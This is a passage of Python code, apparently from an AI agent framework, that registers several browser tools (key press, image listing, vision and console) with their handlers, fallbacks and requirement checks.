fallback=lambda: browser_press(key=args.get("key", ""), task_id=kw.get("task_id")),
|
|
**_browser_router_kw(kw),
|
|
),
|
|
check_fn=check_browser_press_requirements,
|
|
emoji="⌨️",
|
|
)
|
|
|
|
registry.register(
|
|
name="browser_get_images",
|
|
toolset="browser",
|
|
schema=_BROWSER_SCHEMA_MAP["browser_get_images"],
|
|
handler=lambda args, **kw: routed_browser_handler(
|
|
"browser_get_images",
|
|
args,
|
|
fallback=lambda: browser_get_images(task_id=kw.get("task_id")),
|
|
**_browser_router_kw(kw),
|
|
),
|
|
check_fn=check_browser_requirements,
|
|
emoji="🖼️",
|
|
)
|
|
registry.register(
|
|
name="browser_vision",
|
|
toolset="browser",
|
|
schema=_BROWSER_SCHEMA_MAP["browser_vision"],
|
|
handler=lambda args, **kw: routed_browser_handler(
|
|
"browser_vision",
|
|
args,
|
|
fallback=lambda: browser_vision(question=args.get("question", ""), annotate=args.get("annotate", False), task_id=kw.get("task_id")),
|
|
**_browser_router_kw(kw),
|
|
),
|
|
check_fn=check_browser_vision_requirements,
|
|
emoji="👁️",
|
|
)
|
|
registry.register(
|
|
name="browser_console",
|
|
toolset="browser",
|
|
schema=_BROWSER_SCHEMA_MAP["browser_console"],
|
|
handler=lambda args, **kw: routed_browser_handler(
|
|
"browser_console",
|
|
args,
|
|
fallback=lambda: browser_console(clear=args.get("clear", False), expression=args.get("expression"), task_id=kw.get("task_id")),
|
|
**_browser_router_kw(kw),
|
|
),
|
|
check_fn=check_browser_requirements,
|
|
emoji="🖥️",
|
|
)
|